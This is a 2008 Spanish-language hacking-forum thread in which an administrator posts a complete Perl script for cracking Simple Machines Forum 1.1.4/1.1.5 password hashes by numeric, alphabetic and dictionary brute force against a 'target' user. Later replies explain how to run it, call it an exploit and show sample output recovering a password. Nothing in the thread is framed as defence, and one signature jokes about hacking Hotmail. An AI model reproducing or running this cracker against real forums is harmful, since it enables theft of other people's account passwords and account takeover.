vZack
Noviembre 19, 2008, 05:16:10 pm *
Bienvenido(a), Visitante. Favor de ingresar o registrarse.

Ingresar con nombre de usuario, contraseña y duración de la sesión
Noticias: Retos de vZack.com, demuestra todo lo que sabes sobre vulnerabilidades a nivel web click aquí para acceder
 
   Inicio   Ayuda Ingresar Registrarse  
Páginas: [1]   Ir Abajo
  Imprimir  
Autor Tema: SMF Hash Cracker  (Leído 861 veces)
vZor
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 223



« en: Julio 15, 2008, 06:58:38 pm »

Crackeador para hash de smf
 Wink

Código:
#!/usr/bin/perl
#
# Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
# not some hack tool you kid.
# Quickly coded, feel free to improve
#
# Iron
# http://www.randombase.com
# or better: http://www.perlforums.org
#
use Digest::SHA1 'sha1_hex';
print "
Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
by Iron - http://www.randombase.com / http://www.perlforums.org

Menu..
1. Numeric attack
2. Alphabetic attack or whatever
3. Mix 'em up Johnny
4. Dictionary attack
< Choice > ";
chomp($c=<stdin>);
print "[+]Username of the target: ";
chomp($u=lc(<stdin>));
print "[+]Password hash of the target: ";
chomp($p=<stdin>);
print "[+]Cracking... could take a while";
if($c eq '1')
{
   numeric();
}
elsif($c eq '2')
{
   alpha();
}
elsif($c eq '3')
{
   mix();
}
elsif($c eq '4')
{
   dict();
}

sub numeric
{
   $i = 0;
   while(sha1_hex($u.$i) ne $p){$i++;}
   print "\n[+]Sweet! Found the password: ".$i;
}
sub alpha
{
   for($i = "a";$i ne "zzzzzzz" && sha1_hex($u.$i) ne $p;$i++){}
   print "\n[+]Sweet! Found the password: ".$i;
}
sub mix
{
   print "Not finished. Yet.";
}
sub dict # needs some cleaning to make it faster
{
   print "\n[+]I'll need a dictionary though, care to give its filename? ";
   chomp($dict=<stdin>);
   open(d,"<".$dict);
   $found = 0;
   while(($line = <d>))
   {
      chomp($line);
      if(sha1_hex($u.$line) eq $p)
      {
         print "[+]Sweet! Found the password: ".$line;
         $found = 1; next;
      }
   } [url][/url]
      if(!$found)
      {
         print "[-]Not sweet. I couldn't find the password in your dictionary.";
      }
}
En línea

Dacan
Inactivo
*
Desconectado Desconectado

Mensajes: 2


« Respuesta #1 en: Septiembre 16, 2008, 03:27:26 am »

Como lo compilo explica mas para que sirve.

Saludos, Dacan  Wink
En línea
s E t H
Desastre natural
**
Desconectado Desconectado

Sexo: Masculino
Mensajes: 43

LeTs JuAnK jOtMaIl !!


« Respuesta #2 en: Septiembre 16, 2008, 03:42:45 am »

sirve para crackear un hash de smf despues de conseguirlo

como dice
Citar
#!/usr/bin/perl
esta en perl. istala active perl, guarda esto como algo.pl y ejecuta
perl algo.pl [ARGUMENTOS?]
En línea



vZor
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 223



« Respuesta #3 en: Septiembre 21, 2008, 09:09:11 pm »

necesitas el interprete de perl, lo guardas y luego ejecutas como te ha dicho sEtH

salu2
En línea

Wale
Inactivo
*
Desconectado Desconectado

Mensajes: 2


« Respuesta #4 en: Septiembre 24, 2008, 03:08:05 pm »

Buen aporte, aunque soy algo lenta para enternder sobre eso, hay vere  Grin
En línea
Dest0y
Inactivo
*
Desconectado Desconectado

Mensajes: 4


« Respuesta #5 en: Octubre 15, 2008, 01:12:40 am »

Hola.. tengo un hash de SMF 1.1.4 y parece k este exploit no crackea...

alguno a tenido un buen resultado???

saludos

Destr0y
En línea
vZor
Administrator
Dios del caos
******
Desconectado Desconectado

Sexo: Masculino
Mensajes: 223



« Respuesta #6 en: Octubre 18, 2008, 04:01:21 pm »

Hola.. tengo un hash de SMF 1.1.4 y parece k este exploit no crackea...

alguno a tenido un buen resultado???

saludos

Destr0y


funciona perfecto

Código:
Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
by Iron - http://www.randombase.com / http://www.perlforums.org

Menu..
1. Numeric attack
2. Alphabetic attack or whatever
3. Mix 'em up Johnny
4. Dictionary attack
< Choice > 2
[+]Username of the target: test1
[+]Password hash of the target: 1df783f9adca0a58d8a29e1686b341b7b0b42d33
[+]Cracking... could take a while
[+]Sweet! Found the password: abcd
En línea

Dest0y
Inactivo
*
Desconectado Desconectado

Mensajes: 4


« Respuesta #7 en: Octubre 21, 2008, 02:15:30 am »

Hola.. tengo un hash de SMF 1.1.4 y parece k este exploit no crackea...

alguno a tenido un buen resultado???

saludos

Destr0y


funciona perfecto

Código:
Simple Machines Forum v1.1.4/v1.1.5 password hash cracker
by Iron - http://www.randombase.com / http://www.perlforums.org

Menu..
1. Numeric attack
2. Alphabetic attack or whatever
3. Mix 'em up Johnny
4. Dictionary attack
< Choice > 2
[+]Username of the target: test1
[+]Password hash of the target: 1df783f9adca0a58d8a29e1686b341b7b0b42d33
[+]Cracking... could take a while
[+]Sweet! Found the password: abcd

Pues compañero ami esto de  Cracking...could take a while no me sale! se keda en negro al darle al intro!
En línea
Páginas: [1]   Ir Arriba
  Imprimir  
 
Ir a:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.1 | SMF © 2006-2008, Simple Machines LLC XHTML 1.0 válido! CSS válido!